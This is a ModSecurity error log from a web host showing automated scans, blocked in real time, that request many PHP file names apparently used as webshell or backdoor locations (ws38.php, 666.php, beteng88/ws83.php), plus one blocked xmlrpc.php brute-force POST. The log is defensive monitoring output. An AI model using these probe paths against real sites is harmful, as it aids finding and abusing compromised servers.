[Tue May 26 12:54:42.653611 2026] [security2:error] [pid 461618:tid 461838] [client 20.9.81.163:31443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ws38.php"] [unique_id "ahVKulyiSlSCHr1fdr22GQAAAN8"]
[Tue May 26 12:54:42.653746 2026] [security2:error] [pid 461618:tid 461838] [client 20.9.81.163:31443] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ws38.php"] [unique_id "ahVKulyiSlSCHr1fdr22GQAAAN8"]
[Tue May 26 12:54:42.793449 2026] [security2:error] [pid 461618:tid 461790] [client 20.9.81.163:9618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/a7.php"] [unique_id "ahVKulyiSlSCHr1fdr22IAAAAK8"]
[Tue May 26 12:54:42.793597 2026] [security2:error] [pid 461618:tid 461790] [client 20.9.81.163:9618] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/a7.php"] [unique_id "ahVKulyiSlSCHr1fdr22IAAAAK8"]
[Tue May 26 12:54:42.822281 2026] [security2:error] [pid 461618:tid 461869] [client 20.104.227.76:9922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "onlineitmaster.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVKulyiSlSCHr1fdr22IQAAAP4"]
[Tue May 26 12:54:42.915581 2026] [security2:error] [pid 461618:tid 461851] [client 20.9.81.163:1223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/classsmtps.php"] [unique_id "ahVKulyiSlSCHr1fdr22IgAAAOw"]
[Tue May 26 12:54:42.915705 2026] [security2:error] [pid 461618:tid 461851] [client 20.9.81.163:1223] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/classsmtps.php"] [unique_id "ahVKulyiSlSCHr1fdr22IgAAAOw"]
[Tue May 26 12:54:43.032313 2026] [security2:error] [pid 461618:tid 461824] [client 20.9.81.163:44696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/amax.php"] [unique_id "ahVKu1yiSlSCHr1fdr22KgAAANE"]
[Tue May 26 12:54:43.032436 2026] [security2:error] [pid 461618:tid 461824] [client 20.9.81.163:44696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/amax.php"] [unique_id "ahVKu1yiSlSCHr1fdr22KgAAANE"]
[Tue May 26 12:54:43.171536 2026] [security2:error] [pid 461618:tid 461787] [client 20.9.81.163:29861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/CDX1.php"] [unique_id "ahVKu1yiSlSCHr1fdr22LAAAAKw"]
[Tue May 26 12:54:43.171678 2026] [security2:error] [pid 461618:tid 461787] [client 20.9.81.163:29861] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/CDX1.php"] [unique_id "ahVKu1yiSlSCHr1fdr22LAAAAKw"]
[Tue May 26 12:54:43.316082 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:34020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVKu1yiSlSCHr1fdr22NgAAAQI"]
[Tue May 26 12:54:43.316225 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:34020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVKu1yiSlSCHr1fdr22NgAAAQI"]
[Tue May 26 12:54:43.480658 2026] [security2:error] [pid 461618:tid 461867] [client 20.9.81.163:17351] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "azurmediatec.com"] [uri "/1.php"] [unique_id "ahVKu1yiSlSCHr1fdr22OgAAAPw"]
[Tue May 26 12:54:43.480801 2026] [security2:error] [pid 461618:tid 461867] [client 20.9.81.163:17351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/1.php"] [unique_id "ahVKu1yiSlSCHr1fdr22OgAAAPw"]
[Tue May 26 12:54:43.480924 2026] [security2:error] [pid 461618:tid 461867] [client 20.9.81.163:17351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/1.php"] [unique_id "ahVKu1yiSlSCHr1fdr22OgAAAPw"]
[Tue May 26 12:54:43.597179 2026] [security2:error] [pid 461618:tid 461752] [client 74.249.173.207:4450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahVKu1yiSlSCHr1fdr22QQAAAIk"]
[Tue May 26 12:54:43.634993 2026] [security2:error] [pid 461618:tid 461803] [client 20.9.81.163:31445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/chosen.php"] [unique_id "ahVKu1yiSlSCHr1fdr22QgAAALw"]
[Tue May 26 12:54:43.635102 2026] [security2:error] [pid 461618:tid 461803] [client 20.9.81.163:31445] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/chosen.php"] [unique_id "ahVKu1yiSlSCHr1fdr22QgAAALw"]
[Tue May 26 12:54:43.635912 2026] [security2:error] [pid 461618:tid 461826] [client 91.84.111.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahVKu1yiSlSCHr1fdr22OQAAANM"], referer: http://consultrgb.com/
[Tue May 26 12:54:43.761761 2026] [security2:error] [pid 461618:tid 461761] [client 20.9.81.163:1251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/css.php"] [unique_id "ahVKu1yiSlSCHr1fdr22SQAAAJI"]
[Tue May 26 12:54:43.761880 2026] [security2:error] [pid 461618:tid 461761] [client 20.9.81.163:1251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/css.php"] [unique_id "ahVKu1yiSlSCHr1fdr22SQAAAJI"]
[Tue May 26 12:54:43.879756 2026] [security2:error] [pid 461618:tid 461862] [client 20.9.81.163:10257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/php.php"] [unique_id "ahVKu1yiSlSCHr1fdr22SwAAAPc"]
[Tue May 26 12:54:43.879883 2026] [security2:error] [pid 461618:tid 461862] [client 20.9.81.163:10257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/php.php"] [unique_id "ahVKu1yiSlSCHr1fdr22SwAAAPc"]
[Tue May 26 12:54:44.005186 2026] [security2:error] [pid 461618:tid 461814] [client 20.9.81.163:17371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-Blogs.php"] [unique_id "ahVKvFyiSlSCHr1fdr22TgAAAMc"]
[Tue May 26 12:54:44.005296 2026] [security2:error] [pid 461618:tid 461814] [client 20.9.81.163:17371] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-Blogs.php"] [unique_id "ahVKvFyiSlSCHr1fdr22TgAAAMc"]
[Tue May 26 12:54:44.079563 2026] [security2:error] [pid 461618:tid 461849] [client 74.249.173.207:4466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVKvFyiSlSCHr1fdr22TwAAAOo"]
[Tue May 26 12:54:44.127355 2026] [security2:error] [pid 461618:tid 461775] [client 20.9.81.163:33994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/index.php"] [unique_id "ahVKvFyiSlSCHr1fdr22VgAAAKA"]
[Tue May 26 12:54:44.127457 2026] [security2:error] [pid 461618:tid 461775] [client 20.9.81.163:33994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/index.php"] [unique_id "ahVKvFyiSlSCHr1fdr22VgAAAKA"]
[Tue May 26 12:54:44.130184 2026] [security2:error] [pid 461618:tid 461829] [client 157.20.138.61:60666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKu1yiSlSCHr1fdr22TQAAANY"]
[Tue May 26 12:54:44.130367 2026] [security2:error] [pid 461618:tid 461829] [client 157.20.138.61:60666] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKu1yiSlSCHr1fdr22TQAAANY"]
[Tue May 26 12:54:44.295689 2026] [security2:error] [pid 461618:tid 461754] [client 20.9.81.163:37995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVKvFyiSlSCHr1fdr22XQAAAIs"]
[Tue May 26 12:54:44.295812 2026] [security2:error] [pid 461618:tid 461754] [client 20.9.81.163:37995] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVKvFyiSlSCHr1fdr22XQAAAIs"]
[Tue May 26 12:54:44.466979 2026] [security2:error] [pid 461618:tid 461875] [client 20.9.81.163:40967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ws83.php"] [unique_id "ahVKvFyiSlSCHr1fdr22YQAAAQQ"]
[Tue May 26 12:54:44.467084 2026] [security2:error] [pid 461618:tid 461875] [client 20.9.81.163:40967] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ws83.php"] [unique_id "ahVKvFyiSlSCHr1fdr22YQAAAQQ"]
[Tue May 26 12:54:44.630556 2026] [security2:error] [pid 461618:tid 461792] [client 20.9.81.163:9629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file61.php"] [unique_id "ahVKvFyiSlSCHr1fdr22ZQAAALE"]
[Tue May 26 12:54:44.630679 2026] [security2:error] [pid 461618:tid 461792] [client 20.9.81.163:9629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/file61.php"] [unique_id "ahVKvFyiSlSCHr1fdr22ZQAAALE"]
[Tue May 26 12:54:44.759464 2026] [security2:error] [pid 461618:tid 461826] [client 20.9.81.163:37989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/sadcut1.php"] [unique_id "ahVKvFyiSlSCHr1fdr22aQAAANM"]
[Tue May 26 12:54:44.759596 2026] [security2:error] [pid 461618:tid 461826] [client 20.9.81.163:37989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/sadcut1.php"] [unique_id "ahVKvFyiSlSCHr1fdr22aQAAANM"]
[Tue May 26 12:54:44.885587 2026] [security2:error] [pid 461618:tid 461846] [client 20.9.81.163:29859] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/y.php"] [unique_id "ahVKvFyiSlSCHr1fdr22bQAAAOc"]
[Tue May 26 12:54:44.885697 2026] [security2:error] [pid 461618:tid 461846] [client 20.9.81.163:29859] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/y.php"] [unique_id "ahVKvFyiSlSCHr1fdr22bQAAAOc"]
[Tue May 26 12:54:45.018754 2026] [security2:error] [pid 461618:tid 461793] [client 20.9.81.163:40989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/666.php"] [unique_id "ahVKvVyiSlSCHr1fdr22cQAAALI"]
[Tue May 26 12:54:45.018869 2026] [security2:error] [pid 461618:tid 461793] [client 20.9.81.163:40989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/666.php"] [unique_id "ahVKvVyiSlSCHr1fdr22cQAAALI"]
[Tue May 26 12:54:45.152684 2026] [security2:error] [pid 461618:tid 461810] [client 20.9.81.163:40980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/7.php"] [unique_id "ahVKvVyiSlSCHr1fdr22dQAAAMM"]
[Tue May 26 12:54:45.152778 2026] [security2:error] [pid 461618:tid 461810] [client 20.9.81.163:40980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/7.php"] [unique_id "ahVKvVyiSlSCHr1fdr22dQAAAMM"]
[Tue May 26 12:54:45.356616 2026] [security2:error] [pid 461618:tid 461848] [client 20.9.81.163:32716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-config-sample.php"] [unique_id "ahVKvVyiSlSCHr1fdr22fAAAAOk"]
[Tue May 26 12:54:45.356727 2026] [security2:error] [pid 461618:tid 461848] [client 20.9.81.163:32716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-config-sample.php"] [unique_id "ahVKvVyiSlSCHr1fdr22fAAAAOk"]
[Tue May 26 12:54:45.475927 2026] [security2:error] [pid 461618:tid 461824] [client 20.9.81.163:10263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/log.php"] [unique_id "ahVKvVyiSlSCHr1fdr22gAAAANE"]
[Tue May 26 12:54:45.476018 2026] [security2:error] [pid 461618:tid 461824] [client 20.9.81.163:10263] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/log.php"] [unique_id "ahVKvVyiSlSCHr1fdr22gAAAANE"]
[Tue May 26 12:54:45.621700 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:10258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/a5.php"] [unique_id "ahVKvVyiSlSCHr1fdr22hAAAAJk"]
[Tue May 26 12:54:45.621827 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:10258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/a5.php"] [unique_id "ahVKvVyiSlSCHr1fdr22hAAAAJk"]
[Tue May 26 12:54:45.760081 2026] [security2:error] [pid 461618:tid 461759] [client 20.9.81.163:31441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/aa.php"] [unique_id "ahVKvVyiSlSCHr1fdr22iwAAAJA"]
[Tue May 26 12:54:45.760191 2026] [security2:error] [pid 461618:tid 461759] [client 20.9.81.163:31441] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/aa.php"] [unique_id "ahVKvVyiSlSCHr1fdr22iwAAAJA"]
[Tue May 26 12:54:45.878004 2026] [security2:error] [pid 461618:tid 461779] [client 20.9.81.163:17364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/bolt.php"] [unique_id "ahVKvVyiSlSCHr1fdr22jgAAAKQ"]
[Tue May 26 12:54:45.878167 2026] [security2:error] [pid 461618:tid 461779] [client 20.9.81.163:17364] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/bolt.php"] [unique_id "ahVKvVyiSlSCHr1fdr22jgAAAKQ"]
[Tue May 26 12:54:46.014828 2026] [security2:error] [pid 461618:tid 461794] [client 20.9.81.163:9640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/x.php"] [unique_id "ahVKvlyiSlSCHr1fdr22jwAAALM"]
[Tue May 26 12:54:46.014962 2026] [security2:error] [pid 461618:tid 461794] [client 20.9.81.163:9640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/x.php"] [unique_id "ahVKvlyiSlSCHr1fdr22jwAAALM"]
[Tue May 26 12:54:46.146618 2026] [security2:error] [pid 461618:tid 461765] [client 20.9.81.163:30072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/jga.php"] [unique_id "ahVKvlyiSlSCHr1fdr22lAAAAJY"]
[Tue May 26 12:54:46.146721 2026] [security2:error] [pid 461618:tid 461765] [client 20.9.81.163:30072] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/jga.php"] [unique_id "ahVKvlyiSlSCHr1fdr22lAAAAJY"]
[Tue May 26 12:54:46.280591 2026] [security2:error] [pid 461618:tid 461846] [client 20.9.81.163:17361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/k.php"] [unique_id "ahVKvlyiSlSCHr1fdr22mQAAAOc"]
[Tue May 26 12:54:46.280711 2026] [security2:error] [pid 461618:tid 461846] [client 20.9.81.163:17361] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/k.php"] [unique_id "ahVKvlyiSlSCHr1fdr22mQAAAOc"]
[Tue May 26 12:54:46.414655 2026] [security2:error] [pid 461618:tid 461830] [client 20.9.81.163:32750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/vx.php"] [unique_id "ahVKvlyiSlSCHr1fdr22ngAAANc"]
[Tue May 26 12:54:46.414761 2026] [security2:error] [pid 461618:tid 461830] [client 20.9.81.163:32750] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/vx.php"] [unique_id "ahVKvlyiSlSCHr1fdr22ngAAANc"]
[Tue May 26 12:54:46.593014 2026] [security2:error] [pid 461618:tid 461823] [client 20.9.81.163:31448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ws77.php"] [unique_id "ahVKvlyiSlSCHr1fdr22qAAAANA"]
